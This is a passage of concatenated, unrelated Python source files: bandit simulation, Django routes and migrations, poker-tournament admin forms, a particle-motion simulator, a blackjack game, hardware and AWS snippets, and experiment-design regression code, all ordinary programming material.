    Keyword args (forwarded to learn): eps (eps-greedy), alpha (gradient
    bandit step size), c (UCB exploration constant).
    """
    eps = kwargs.get("eps", None)
    alpha = kwargs.get("alpha", None)
    c = kwargs.get("c", None)
    bandit_cls = bandit.__class__
    k = bandit.k
    reward_curves = np.zeros((it, time_steps))
    for run in range(it):
        q = np.random.normal(0, 1, k)
        rewards = np.asarray([np.random.normal(mean, 1, 1000) for mean in q])
        trial = bandit_cls(k, rewards)
        reward_curves[run] = trial.learn(time_steps=time_steps, eps=eps, c=c, alpha=alpha)
    return np.mean(reward_curves, axis=0)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
import urllib
import urllib2
def json_response(url, query_args):
    """POST *query_args* (form-encoded) to *url* and decode the JSON reply.

    parameters : url, query_args
    Returns the parsed JSON body on HTTP 200, otherwise None.
    (Python 2 code: uses urllib/urllib2.)
    """
    encoded = urllib.urlencode(query_args)
    reply = urllib2.urlopen(urllib2.Request(url, encoded))
    if reply.code != 200:
        return None
    return json.loads(reply.read())
def dict_response(data):
    """Project the prayer-times API payload onto a fixed set of keys,
    dropping everything else."""
    wanted = ('HicriTarih',
              'UlkeAdi', 'SehirAdi',
              'KibleAcisi', 'MoonSrc',
              'Imsak', 'Gunes', 'Ogle', 'Ikindi', 'Aksam', 'Yatsi')
    return {key: data[key] for key in wanted}
|
from enum import Enum
class DialogAction:
    """A single agent action in the dialog.

    An action is described by its `ActionType`, optionally refined by the
    predicate (slot) it concerns, the value assigned to that predicate, and
    the action that preceded it. E.g., confirming that the trigger channel
    is Facebook has type ActionType.confirm, predicate TRIGGER_CHANNEL and
    value Facebook. Predicate and value are meaningless for some types
    (e.g. greet/close).

    Attributes:
        type (`ActionType`): Action type.
        predicate (str): The slot/predicate/variable/placeholder
            corresponding to this action.
        value (str): Value of the predicate.
        prev_action (`DialogAction`): The previous action.
    """

    def __init__(self, action_type, predicate=None, value=None,
                 prev_action=None):
        self.type = action_type
        self.predicate = predicate
        self.value = value
        self.prev_action = prev_action

    def __repr__(self):
        return ("Type:{}\nPredicate:{}\nValue:{}\nPrevious Action:{}"
                .format(self.type, self.predicate, self.value,
                        self.prev_action))
class ActionType(Enum):
    """Closed set of dialog-action types; each member's value mirrors its name."""
    greet = "greet"
    reword = "reword"
    ask_slot = "ask_slot"
    confirm = "confirm"
    inform = "inform"
    close = "close"
|
import unittest
from HTMLTestRunner import HTMLTestRunner
from setting import TEST_REPOET_PATH
if __name__ == '__main__':
suite = unittest.TestLoader().discover('./cases','test*.py')
with open(TEST_REPOET_PATH,'wb') as e:
runner = HTMLTestRunner(e,title='测试报告')
runner.run(suite) |
from scatter import scatter_df as scatter_df
from data import plt as plt
import numpy as np
from matplotlib import animation
# Initialize plot objects
fig = plt.figure()
scat = plt.scatter([], [])
nframes = 100
# Set axes
xmin = scatter_df.min()['x_coordinate']
ymin = scatter_df.min()['y_coordinate']
xmax = scatter_df.max()['x_coordinate']
ymax = scatter_df.max()['y_coordinate']
plt.xlim(xmin, xmax)
plt.ylim(ymin, ymax)
def animate(i, data, scat):
    """Animation frame callback: reveal the first *i* points on the scatter.

    Args:
        i: frame index (number of points to show).
        data: DataFrame with 'x_coordinate' / 'y_coordinate' columns.
        scat: the PathCollection returned by plt.scatter.

    Returns:
        Tuple of updated artists, as FuncAnimation/blitting expects.
    """
    # Bug fix: the original wrapped this body in `while i <= len(data):`
    # with an unconditional return -- a misused while acting as an `if` that
    # also returned None for i > len(data) -- and indexed a pandas Series
    # with a (slice, newaxis) tuple, which pandas rejects. Build the
    # offsets array explicitly instead; iloc[:i] clamps i safely.
    frame = data.iloc[:i]
    offsets = np.column_stack((frame['x_coordinate'].to_numpy(),
                               frame['y_coordinate'].to_numpy()))
    scat.set_offsets(offsets)
    return scat,
# Run animation and save as mp4
scatter_anim = animation.FuncAnimation(fig, animate,
frames=range(nframes),
fargs=(scatter_df, scat))
scatter_anim.save('scatter_animated.mp4')
|
import math
import random
def randomCard(cards):
    """Return a uniformly random card from *cards*.

    Bug fix: the original used random.randrange(0, len(cards) - 1), whose
    stop is exclusive, so the last card could never be drawn and a one-card
    deck raised ValueError. random.choice samples every card uniformly.
    """
    return random.choice(cards)
def game():
    """Play an endless interactive single-player blackjack-style loop.

    Builds a 52-card deck (face cards count as 10), deals two cards per
    round, then lets the player hit until they bust or pass.
    NOTE(review): the outer `while True` never exits, so the recursive
    game() call after it is unreachable; there is also no dealer and aces
    always count as 1 -- confirm whether that is intended.
    """
    # build the deck: 4 suits x values 1..13
    cards = []
    for i in range(4):
        for j in range(1, 14):
            cards.append(j)
    while True:
        # deal two cards, clamping face cards (J/Q/K) to value 10
        card1 = randomCard(cards)
        cards.remove(card1)
        if card1 > 10:
            card1 = 10
        card2 = randomCard(cards)
        cards.remove(card2)
        if card2 > 10:
            card2 = 10
        total = card1+card2
        proceed = False
        while not proceed:
            print('your hand is: ' + str(card1) + ', ' + str(card2))
            move = input('hit/pass: ')
            if move == 'hit':
                new_card = randomCard(cards)
                cards.remove(new_card)
                total += new_card
                if total>21:
                    print('you lose you fucking noob now play again')
                    proceed = True
            elif move == 'pass':
                # Bug fix: previously printed card1 + card2 (the initial
                # hand), ignoring any cards taken with 'hit'; show the
                # running total instead.
                print('your total is: ' + str(total) + ' restarting..')
                proceed = True
    game()
game()
|
from django.urls import path, include
from api.views import AddToFavorites, AddToFollows, Purchases, IngredientView
urlpatterns = [
path('v1/', include([
path('favorites/',
AddToFavorites.as_view(),
name='add_favorites',),
path('favorites/<int:id>/',
AddToFavorites.as_view(),
name='delete_favorites',),
path('ingredients/',
IngredientView.as_view(),
name='ingredients',),
path('subscriptions/',
AddToFollows.as_view(),
name='follow',),
path('subscriptions/<int:author_id>/',
AddToFollows.as_view(),
name='unfollow',),
path('purchases/',
Purchases.as_view(),
name='add_purchase'),
path('purchases/<int:recipe_id>/',
Purchases.as_view(),
name='delete_purchase'),
]))
]
|
# -*- coding: utf-8 -*-
""" Administration forms used to edit tournaments """
from app.forms import custom_validators, CustomGrid, CustomFieldSet, \
create_date_field
from app.models import Season, Tournament, Result, User
from app.utils import formatting
from formalchemy.fields import Field
from formalchemy.tables import Grid
import datetime
# Patterns & formats used by the validators
DT_FORMAT = "%d/%m/%Y"


# Helpers used to enrich formalchemy fields with labels & validators.
# Fix: plain ``def`` functions instead of lambdas assigned to names (PEP 8
# E731); call sites are unchanged.
def SEASON(field, season_options):
    """Label the field "Saison" and render it as a dropdown of seasons."""
    return field.label(u"Saison").dropdown(options=season_options)


def SEASON_READONLY(field):
    """Read-only field labelled "Saison"."""
    return field.label(u"Saison").readonly()


def POSITION_READONLY(field):
    """Read-only field labelled "Position"."""
    return field.label(u"Position").readonly()


def FORMATTED_DT(field):
    """Label the field "Date" and attach the tournament-date validator."""
    return field.label(u"Date").validate(custom_validators.tournament_dt_validator(DT_FORMAT))


def BUYIN(field):
    """Field labelled "Buyin"."""
    return field.label(u"Buyin")
class EditTournamentsGrid(CustomGrid):
    """ Administration grid used to edit tournaments """

    def __init__(self):
        # Grid initialization: list every tournament, ordered by date
        super(EditTournamentsGrid, self).__init__(Tournament, Tournament.all(order_by_clause=Tournament.tournament_dt)) #@UndefinedVariable
        # Creation of a customized date field to edit the tournaments' date
        self.append(create_date_field("formatted_tournament_dt", "tournament_dt", DT_FORMAT))
        # Grid configuration: season/position are read-only, the date is validated
        inc = [SEASON_READONLY(self.season_id), POSITION_READONLY(self.position), FORMATTED_DT(self.formatted_tournament_dt), BUYIN(self.buyin)]
        self.configure(include=inc)

    def post_sync(self):
        """Hook run after the grid is synchronized with the model."""
        # Parses the entered date and updates the model
        self.model.tournament_dt = datetime.datetime.strptime(self.formatted_tournament_dt.value, DT_FORMAT).date()
        # Reshuffles the tournaments so that they are still ordered by date
        Season.get(self.model.season_id).reorder_tournaments()
class NewTournamentFieldSet(CustomFieldSet):
    """ Administration form used to create tournaments """

    def __init__(self):
        # FieldSet initialization
        super(NewTournamentFieldSet, self).__init__(Tournament)
        # Creation of a customized date field to edit the tournament's date
        self.append(create_date_field("formatted_tournament_dt", "tournament_dt", DT_FORMAT))
        # FieldSet configuration: one dropdown entry per existing season
        season_options = [("Saison %s (%s - %s)" %(season.id, season.start_year, season.end_year), season.id) for season in Season.all()]
        inc = [SEASON(self.season, season_options), FORMATTED_DT(self.formatted_tournament_dt), BUYIN(self.buyin)]
        self.configure(include=inc)

    def post_sync(self):
        """Hook run after the fieldset is synchronized with the model."""
        # Parses the entered date and updates the model
        self.model.tournament_dt = datetime.datetime.strptime(self.formatted_tournament_dt.value, DT_FORMAT).date()
        # Appends the tournament in the end of the collection (i.e. in last position)
        # The tournament should be appended to the season and not just be added to the session :
        # see the collection_class used at the Season level to store tournaments
        season = Season.get(self.model.season_id)
        season.tournaments.append(self.model)
        # Reshuffles the tournaments so that they are still ordered by date
        season.reorder_tournaments()
class EditResultsGrid(Grid):
    """ Administration grid used to edit tournament results """

    def __init__(self):
        super(EditResultsGrid, self).__init__(Result)
        # Status dropdown: present / absent / maybe
        STATUS_OPTIONS = [(u"Présent", Result.STATUSES.P), (u"Absent", Result.STATUSES.A), (u"Peut-être", Result.STATUSES.M)]
        # Rank dropdown: empty choice plus formatted ranks 1..len(users)-1
        RANK_OPTIONS = [(u"", None)] + [(formatting.append(i, formatting.to_rank), i) for i in range(1, len(User.all()))]
        # Virtual read-only column showing the player's pseudonym
        self.append(Field("pseudonym", value=lambda result: result.user.pseudonym))
        # Buyin is required for present players; buyin, rank and profit are
        # all forbidden for absent/maybe statuses.
        inc = [
            self.pseudonym.label(u"Joueur").readonly(),
            self.status.label(u"Statut").dropdown(options=STATUS_OPTIONS),
            self.buyin.label(u"Mise").validate(custom_validators.required_for([Result.STATUSES.P])).validate(custom_validators.forbidden_for([Result.STATUSES.M, Result.STATUSES.A])),
            self.rank.label(u"Classement").dropdown(options=RANK_OPTIONS).validate(custom_validators.forbidden_for([Result.STATUSES.M, Result.STATUSES.A])),
            self.profit.label(u"Gain").validate(custom_validators.forbidden_for([Result.STATUSES.M, Result.STATUSES.A])),
        ]
        self.configure(include=inc)
# Generated by Django 3.0 on 2020-01-18 03:01
from django.db import migrations, models
import django.db.models.deletion
# Auto-generated initial migration (Django 3.0): creates the POS schema --
# Customer, Supplier, Sales, Product and OrderItem.
class Migration(migrations.Migration):

    # First migration of the app: no dependencies.
    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Customer',
            fields=[
                ('identity', models.IntegerField(primary_key=True, serialize=False)),
                ('customer', models.CharField(max_length=20)),
                ('customer_phone', models.IntegerField(blank=True, null=True)),
                ('customer_type', models.CharField(blank=True, default='customer', max_length=200, null=True)),
                ('address', models.TextField(blank=True, max_length=500, null=True)),
                ('email', models.EmailField(max_length=100, unique=True)),
                ('image', models.ImageField(upload_to='customer')),
            ],
        ),
        migrations.CreateModel(
            name='Supplier',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(blank=True, max_length=100, null=True)),
                ('address', models.CharField(blank=True, max_length=250, null=True)),
                ('phone', models.CharField(blank=True, max_length=100, null=True)),
                ('mobile_no', models.CharField(blank=True, max_length=100, null=True)),
            ],
        ),
        # A sale belongs to one customer; deleting the customer cascades.
        migrations.CreateModel(
            name='Sales',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('total_price', models.DecimalField(decimal_places=2, default=0, max_digits=10)),
                ('timestamp', models.DateTimeField(auto_now=True)),
                ('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='posapp.Customer')),
            ],
        ),
        migrations.CreateModel(
            name='Product',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=100, unique=True)),
                ('brand_name', models.CharField(blank=True, max_length=200, null=True)),
                ('price', models.IntegerField()),
                ('image', models.ImageField(upload_to='product')),
                ('supplier', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='posapp.Supplier')),
            ],
        ),
        # Line item joining a Sales order to a Product.
        migrations.CreateModel(
            name='OrderItem',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('timestamp', models.DateTimeField(auto_now=True)),
                ('order', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='posapp.Sales')),
                ('product', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='posapp.Product')),
            ],
        ),
    ]
|
#!/usr/bin/env python
# coding: utf-8
# In[1]:
from tensorflow import lite
from tensorflow.keras import models
# In[2]:
# Parameters
keras_model_filename = 'wake_word_stop_model.h5'
tflite_filename = 'wake_word_stop_lite.tflite'

# In[3]:

# Convert the trained Keras model to a TensorFlow Lite flatbuffer.
model = models.load_model(keras_model_filename)
converter = lite.TFLiteConverter.from_keras_model(model)
tflite_model = converter.convert()
# Bug fix: use a context manager so the output file is flushed and closed
# deterministically (the original leaked the handle from open(...).write(...)).
with open(tflite_filename, 'wb') as f:
    f.write(tflite_model)
# In[ ]:
|
import boto.ec2
import WH
if __name__ == '__main__':
    # Connect the warehouse helper, then list every allocated Elastic IP
    # in the us-west-2 region.
    wh = WH.WH()
    wh.connect()
    conn = boto.ec2.connect_to_region("us-west-2")
    for a in conn.get_all_addresses():
        # Fix: print() function call instead of the Python 2-only
        # ``print "%s" %`` statement (SyntaxError on Python 3; this form
        # works on both interpreters).
        print("%s" % (a.public_ip))
|
from pyfirmata import Arduino, util
from time import sleep
def judge(x, y, z):
    """Write the three PWM duty cycles to pins 3, 5 and 6 respectively."""
    for pin, duty in zip((pin3, pin5, pin6), (x, y, z)):
        pin.write(duty)
board = Arduino('/dev/ttyS0')
pin3 = board.get_pin('d:3:p')
pin5 = board.get_pin('d:5:p')
pin6 = board.get_pin('d:6:p')

# Cycle the three PWM outputs: exactly one channel is driven at full duty
# at a time, switching every 0.2 s.
# Bug fix: the original called ``float(0, 0, 1)`` which raises TypeError
# (float() takes at most one argument); plain tuples provide the three
# values the unpacking/judge() call needs.
while True:
    for (x, y, z) in ((0.0, 0.0, 1.0), (0.0, 1.0, 0.0), (1.0, 0.0, 0.0)):
        judge(x, y, z)
        sleep(0.2)
|
#! /usr/bin/env python
"""
Calculate the difference between an image and a video
USING:
As a command line utility:
$ FrameGrabber.py input_video frame_no output_image
As a module:
import VideoDifference
dif = VideoDifference("input_video.avi", input_image)
bg = dif.difference()
Author: Martin Humphreys
"""
from argparse import ArgumentParser
from math import floor, ceil
from skimage.io import imread
import random
import os
import re
import pickle
import scipy.io
from DataBag import DataBag
import numpy as np
# import cv2
class linear_motion:
    """Constant-velocity motion model.

    Velocity components are drawn from normal distributions each time the
    model is (re)assigned to a particle.
    """

    def __init__(self, dx_mean=0, dx_std=0, dy_mean=0, dy_std=0):
        self.dx_mean = dx_mean
        self.dx_std = dx_std
        self.dy_mean = dy_mean
        self.dy_std = dy_std

    def set(self, particle, n=0):
        """Attach *particle* and sample a fresh velocity.

        Fix: accept the spawn frame ``n`` (unused for linear motion, default
        0) so the signature matches the sibling motion models --
        Particle.gen() always calls ``motion_model.set(self, n)``, which
        raised TypeError with the original one-argument signature.
        """
        self.particle = particle
        self.dx = np.random.normal(self.dx_mean, self.dx_std)
        self.dy = np.random.normal(self.dy_mean, self.dy_std)

    def tick(self, n):
        """Return the particle position at frame *n* (offset from spawn point)."""
        x = self.particle.sx + (self.dx * n)
        y = self.particle.sy + (self.dy * n)
        return x, y
class second_order_motion:
    """Constant-acceleration (second-order) motion model."""

    def __init__(self, params):
        # Mean/std pairs for the velocity (d*) and acceleration (dd*) draws.
        for key in ('dx_mean', 'dx_std', 'dy_mean', 'dy_std',
                    'ddx_mean', 'ddx_std', 'ddy_mean', 'ddy_std'):
            setattr(self, key, params[key])

    def set(self, particle, n):
        """Attach *particle*; sample acceleration, then velocity at frame *n*."""
        self.particle = particle
        self.ddx = np.random.normal(self.ddx_mean, self.ddx_std)
        self.ddy = np.random.normal(self.ddy_mean, self.ddy_std)
        self.dx = np.random.normal(self.dx_mean, self.dx_std) + self.ddx * n
        self.dy = np.random.normal(self.dy_mean, self.dy_std) + self.ddy * n

    def tick(self, n):
        """Kinematics s = s0 + v*t + a*t^2/2, with t counted from spawn frame sn."""
        dt = n - self.particle.sn
        x = self.particle.sx + self.dx * dt + 0.5 * self.ddx * dt ** 2
        y = self.particle.sy + self.dy * dt + 0.5 * self.ddy * dt ** 2
        return x, y
class horizontal_split_motion:
    """Second-order motion whose vertical direction depends on which side of
    the vertical line ``x = split`` the particle is on: right of the split
    dy is forced negative, left of it dy is forced positive.
    """

    def __init__(self, params):
        self.dx_mean = params['dx_mean']
        self.dx_std = params['dx_std']
        self.dy_mean = params['dy_mean']
        self.dy_std = params['dy_std']
        self.ddx_mean = params['ddx_mean']
        self.ddx_std = params['ddx_std']
        self.ddy_mean = params['ddy_mean']
        self.ddy_std = params['ddy_std']
        self.split = params['split']
        # -1 / 0 / +1: side of the split at the previous tick (0 = unknown).
        self.state = 0

    def set(self, particle, n):
        """Attach *particle* and sample acceleration/velocity at frame *n*."""
        self.particle = particle
        self.ddx = np.random.normal(self.ddx_mean, self.ddx_std)
        self.ddy = np.random.normal(self.ddy_mean, self.ddy_std)
        self.dx = np.random.normal(self.dx_mean, self.dx_std) + self.ddx * n
        self.dy = np.random.normal(self.dy_mean, self.dy_std) + self.ddy * n
        # On first assignment the particle has no position yet, hence EAFP.
        try:
            if self.particle.x > self.split:
                self.dy = -np.abs(self.dy)
            else:
                self.dy = np.abs(self.dy)
        except AttributeError:
            pass

    def tick(self, n):
        """Advance to frame *n*.

        When the particle crosses the split line, the vertical direction
        flips and the kinematic origin (sn, sx, sy) is reset so the
        second-order formula restarts from the crossing point.
        """
        prev_state = self.state
        if self.particle.x > self.split:
            self.dy = -np.abs(self.dy)
            self.state = 1
        elif self.particle.x < self.split:
            self.dy = np.abs(self.dy)
            self.state = -1
        if self.state != prev_state:
            self.particle.sn = n
            self.particle.sx = self.particle.x
            self.particle.sy = self.particle.y
        x = self.particle.sx + (self.dx * (n - self.particle.sn)) + 0.5 * (self.ddx * (n - self.particle.sn) ** 2)
        y = self.particle.sy + (self.dy * (n - self.particle.sn)) + 0.5 * (self.ddy * (n - self.particle.sn) ** 2)
        return x, y
class Particle:
    """A single simulated particle bound to a Simulator and a motion model."""

    def __init__(self, sim, id_gen, motion_model, particle_class, class_sprites):
        self.id_gen = id_gen
        self.sim = sim
        self.motion_model = motion_model
        self.class_sprites = class_sprites
        self.particle_class = particle_class
        # Per-class category id and area constant -- TODO confirm units (px^2?)
        if self.particle_class == 'drop':
            self.category = 1
            self.area = 250
        elif self.particle_class == 'sand':
            self.category = 2
            self.area = 100
        self.gen()

    def gen(self, x=None, y=None, n=None):
        """(Re)spawn the particle: new id, new velocity sample, new start point.

        Both x and y None -> uniformly random position in the domain.
        Exactly one of them None -> enter from the domain edge matching the
        motion direction (used by tick() on wrap-around).  The particle is
        registered in the simulator's ground-truth bag.
        """
        self.id = self.id_gen()
        if n is None:
            self.sn = 0
            n = 0
        else:
            self.sn = n
        self.motion_model.set(self, n)
        if x is None and y is None:
            self.sx = random.randint(0, self.sim.width-1)
            self.sy = random.randint(0, self.sim.height-1)
        elif x is None:
            if self.motion_model.dx > 0:
                self.sx = 0
            else:
                self.sx = self.sim.width-1
            self.sy = y
        elif y is None:
            if self.motion_model.dy > 0:
                self.sy = 0
            else:
                self.sy = self.sim.height-1
            self.sx = x
        self.x = self.sx
        self.y = self.sy
        self.sprite = random.choice(self.class_sprites)
        # NOTE(review): the randomly chosen sprite is immediately discarded --
        # looks like sprite rendering was deliberately disabled; confirm.
        self.sprite = None
        d = {'id': self.id,
             'area': self.area,
             'category': self.category}
        self.sim.bag.batchInsertParticle(d)

    def tick(self, n):
        """Advance to frame *n*; respawn from the opposite edge on wrap-around."""
        _x, _y = self.motion_model.tick(n)
        x, y = _x % self.sim.width, _y % self.sim.height
        if _y != y:
            y = None
            self.gen(x, y, n)
        elif _x != x:
            x = None
            self.gen(x, y, n)
        else:
            self.x, self.y = x, y
class Simulator:
    """Synthetic particle-motion simulator.

    Generates 'drop' and 'sand' particle trajectories and records them in
    two DataBag databases: a ground-truth bag (stable particle ids) and a
    parallel detection bag where every per-frame observation gets a fresh id.
    """

    def __init__(self, bag, verbose=True):
        self.verbose = verbose
        if self.verbose:
            print("initializing...")
        # Ground-truth bag plus a '<name>_detection.<ext>' sibling bag.
        self.bag = DataBag(bag, verbose = self.verbose)
        self.detection_bag = DataBag(bag.split('.')[0]+'_detection.'+bag.split('.')[1], verbose = self.verbose)
        self.detection_pid = 0
        self.height, self.width = (1000, 1000)
        drop_num = 100
        sand_num = 0
        # Motion-model parameters; 'split' is the x position where
        # horizontal_split_motion flips the vertical direction.
        drop_params = {'dx_mean': 0,
                       'dx_std': 2,
                       'dy_mean': -10,
                       'dy_std': 2,
                       'ddx_mean': 0,
                       'ddx_std': 0,
                       'ddy_mean': 0.00,
                       'ddy_std': 0,
                       'split': 500,
                       }
        sand_params = {'dx_mean': 0,
                       'dx_std': 1,
                       'dy_mean': 5,
                       'dy_std': 1,
                       'ddx_mean': 0,
                       'ddx_std': 0,
                       'ddy_mean': 0.05,
                       'ddy_std': 0,
                       }
        # Only the first sprite of each class is kept ([:1]).
        self.drop_sprites = self.loadSprites('/local/scratch/mot/data/crops/noscale/training/bitumen/')[:1]
        self.sand_sprites = self.loadSprites('/local/scratch/mot/data/crops/noscale/training/sand/')[:1]
        if self.verbose:
            print("sprites loaded...")
        self.particles = []

        def counter(first = 1):
            # Closure-based id generator: each call to the returned function
            # yields the next integer id, starting at *first*.
            current = [first - 1]
            def next():
                current[0] += 1
                return current[0]
            return next

        id_gen = counter()
        for n in range(drop_num):
            motion_model = horizontal_split_motion(drop_params)
            p = Particle(self, id_gen, motion_model, 'drop', self.drop_sprites)
            self.particles.append(p)
        for n in range(sand_num):
            motion_model = horizontal_split_motion(sand_params)
            p = Particle(self, id_gen, motion_model, 'sand', self.sand_sprites)
            self.particles.append(p)
        if self.verbose:
            print("particle selection complete...")

    def loadSprites(self, folder):
        """Load every image in *folder* as a greyscale sprite array.

        NOTE(review): ``as_grey`` is a legacy scikit-image keyword (renamed
        ``as_gray`` in newer releases) -- confirm the pinned version.
        """
        sprites = []
        files = os.listdir(folder)
        for sfile in files:
            sprite = imread(folder + "/" + sfile, as_grey=True)
            sprites.append(sprite)
        return sprites

    def updateDataBag(self, n):
        """Record frame *n*: one ground-truth row per particle, and a
        detection row under a fresh, ever-increasing detection id."""
        for p in self.particles:
            crop = p.sprite
            d = {'frame': n,
                 'particle': p.id,
                 'x': p.x,
                 'y': p.y,
                 'crop': crop}
            self.bag.batchInsertAssoc(d)
            d = {'id': self.detection_pid,
                 'area': p.area,
                 'category': p.category}
            self.detection_bag.batchInsertParticle(d)
            d = {'frame': n,
                 'particle': self.detection_pid,
                 'x': p.x,
                 'y': p.y,
                 'crop': crop}
            self.detection_bag.batchInsertAssoc(d)
            self.detection_pid += 1

    def gkern(self, l=5, sig=1.):
        """
        creates gaussian kernel with side length l and a sigma of sig
        """
        ax = np.arange(-l // 2 + 1., l // 2 + 1.)
        xx, yy = np.meshgrid(ax, ax)
        kernel = np.exp(-(xx**2 + yy**2) / (2. * sig**2))
        return kernel / np.sum(kernel)

    def generate(self, n=10):
        """Run the simulation for *n* frames and commit both bags.

        NOTE(review): the loop variable shadows the parameter
        (``for n in range(n)``) -- works, but confusing.
        """
        # Chart animation
        # vw = cv2.VideoWriter('/local/scratch/mot/data/videos/deepVelocity/gt_tmp5_local.avi', 0 , 24, (101, 101), False)
        for n in range(n):
            if self.verbose:
                print("frame ", n, ' ...')
            [p.tick(n) for p in self.particles]
            # self.particles = [p for p in self.particles if p.alive]
            self.updateDataBag(n)
            d = {'number': n}
            self.bag.batchInsertFrame(d)
            '''
            For a chart:
            Draw the probability curve to video
            '''
            # dy mean + ddy mean * time
            roll = int(-10 + 0.05 * n)
            # vw.write(np.uint8(255*np.roll(self.gkern(101, 2)/np.max(self.gkern(101,2)), roll, axis=0)))
        # vw.release()
        self.bag.commit()
        self.detection_bag.commit()
import random
import time
import sklearn.linear_model as lm
from scipy.stats import f, t
from functools import partial
from pyDOE2 import *
from beautifultable import BeautifulTable
# Гутов Віталій
# Варіант 108:
# x1_min = -5, x1_max = 7,
# x2_min = -10, x2_max = 3,
# x3_min = -7, x3_max = 1
# y_min = 200 + xc_min
# y_max = 200 + xc_max
def plan_matrix(n, m):
    """Build the experiment plan.

    Returns (x, y, x_norm): the naturalized factor matrix, random responses
    drawn from the module-level [y_min, y_max], and the normalized
    central-composite design matrix with interaction and squared-term
    columns.  Both factor matrices are pretty-printed.
    """
    y = np.zeros(shape=(n, m))
    for i in range(n):
        for j in range(m):
            y[i][j] = random.randint(y_min, y_max)
    # Number of center points for the composite design.
    if n > 14:
        no = n - 14
    else:
        no = 1
    # Central composite design for 3 factors, plus a leading column of ones (b0)
    # and seven zero columns (filled below with interaction/squared terms).
    x_norm = ccdesign(3, center=(0, no))
    x_norm = np.insert(x_norm, 0, 1, axis=1)
    for i in range(4, 11):
        x_norm = np.insert(x_norm, i, 0, axis=1)
    # Star-point arm length; clamp axial points to +/- l.
    l = 1.215
    for i in range(len(x_norm)):
        for j in range(len(x_norm[i])):
            if x_norm[i][j] < -1 or x_norm[i][j] > 1:
                if x_norm[i][j] < 0:
                    x_norm[i][j] = -l
                else:
                    x_norm[i][j] = l

    def add_sq_nums(x):
        # Fill columns 4..10 with interaction and squared terms of x1..x3.
        for i in range(len(x)):
            x[i][4] = x[i][1] * x[i][2]
            x[i][5] = x[i][1] * x[i][3]
            x[i][6] = x[i][2] * x[i][3]
            x[i][7] = x[i][1] * x[i][3] * x[i][2]
            x[i][8] = x[i][1] ** 2
            x[i][9] = x[i][2] ** 2
            x[i][10] = x[i][3] ** 2
        return x

    x_norm = add_sq_nums(x_norm)
    # Naturalized matrix: map the -1/+1 levels of the first 8 rows to the
    # real factor bounds, remaining rows to the range centers.
    x = np.ones(shape=(len(x_norm), len(x_norm[0])), dtype=np.int64)
    for i in range(8):
        for j in range(1, 4):
            if x_norm[i][j] == -1:
                x[i][j] = x_range[j - 1][0]
            else:
                x[i][j] = x_range[j - 1][1]
    for i in range(8, len(x)):
        for j in range(1, 3):
            x[i][j] = (x_range[j - 1][0] + x_range[j - 1][1]) / 2
    # Axial (star) points placed at +/- l * half-range around each center.
    dx = [x_range[i][1] - (x_range[i][0] + x_range[i][1]) / 2 for i in range(3)]
    x[8][1] = l * dx[0] + x[9][1]
    x[9][1] = -l * dx[0] + x[9][1]
    x[10][2] = l * dx[1] + x[9][2]
    x[11][2] = -l * dx[1] + x[9][2]
    x[12][3] = l * dx[2] + x[9][3]
    x[13][3] = -l * dx[2] + x[9][3]
    x = add_sq_nums(x)
    x_table = BeautifulTable()
    for i in range(n):
        x_table.rows.append([*x[i]])
    print('x matrix:')
    print(x_table)
    x_norm_table = BeautifulTable()
    for i in range(n):
        x_norm_table.rows.append([*x_norm[i]])
    print('Normalized x matrix:')
    print(x_norm_table)
    return x, y, x_norm
def regression(x, b):
    """Evaluate the fitted equation: sum of factor * coefficient products."""
    return sum(xi * bi for xi, bi in zip(x, b))
def s_kv(y, y_aver, n, m):
    """Per-row sample variances of *y* about the row means *y_aver*, rounded to 3 dp."""
    return [round(sum((y_aver[i] - obs) ** 2 for obs in y[i][:m]) / m, 3)
            for i in range(n)]
def coef_finding(x, y, norm=False):
    """Fit a no-intercept linear regression of y on x and return the
    coefficients rounded to 3 decimal places (also prints them and the
    model's predictions)."""
    model = lm.LinearRegression(fit_intercept=False)
    model.fit(x, y)
    if norm == 1:
        print('\nCoefficients of the regression equation with normalized x:')
    else:
        print('\nCoefficients of the regression equation:')
    coeffs = [round(c, 3) for c in model.coef_]
    print(coeffs)
    print('\nThe result of the equation with the found coefficients:\n{}'.format(np.dot(x, coeffs)))
    return coeffs
def kohren_kr(y, y_aver, n, m):
    """Cochran's statistic Gp: the largest row variance divided by the sum
    of all row variances."""
    variances = s_kv(y, y_aver, n, m)
    gp = max(variances) / sum(variances)
    print('\nKohren check')
    return gp
def kohren(f1, f2, q=0.05):
    """Critical value of Cochran's G for degrees of freedom (f1, f2) at
    significance level *q*, derived from the Fisher distribution."""
    f_crit = f.ppf(q=1 - q / f1, dfn=f2, dfd=(f1 - 1) * f2)
    return f_crit / (f_crit + f1 - 1)
def bs(x, y_aver, n):
    """Coefficient estimates for the normalized plan: mean response first,
    then one column-wise dot product with y_aver (divided by n) per factor."""
    estimates = [sum(y_aver) / n]
    for col in range(len(x[0])):
        estimates.append(sum(xv * yv for xv, yv in zip(x[:, col], y_aver)) / n)
    return estimates
def student_kr(x, y, y_aver, n, m):
    """Student's t statistic for every coefficient estimate, rounded to 3 dp."""
    variances = s_kv(y, y_aver, n, m)
    # Standard error of a coefficient: sqrt(mean variance / (n * m)).
    s_beta = (sum(variances) / n / n / m) ** 0.5
    return [round(abs(est) / s_beta, 3) for est in bs(x, y_aver, n)]
def fisher_kr(y, y_aver, y_new, n, m, d):
    """Fisher adequacy statistic: adequacy variance over the mean
    reproducibility variance."""
    s_ad = m / (n - d) * sum((y_new[i] - y_aver[i]) ** 2 for i in range(len(y)))
    s_mean = sum(s_kv(y, y_aver, n, m)) / n
    return s_ad / s_mean
def check(x, y, b, n, m):
    """Run the three statistical checks (Cochran, Student, Fisher) on the
    fitted model and report the wall-clock time of each check."""
    print('\nCheck the equation:')
    f1 = m - 1
    f2 = n
    f3 = f1 * f2
    q = 0.05
    student = partial(t.ppf, q=1 - q)
    t_student = student(df=f3)
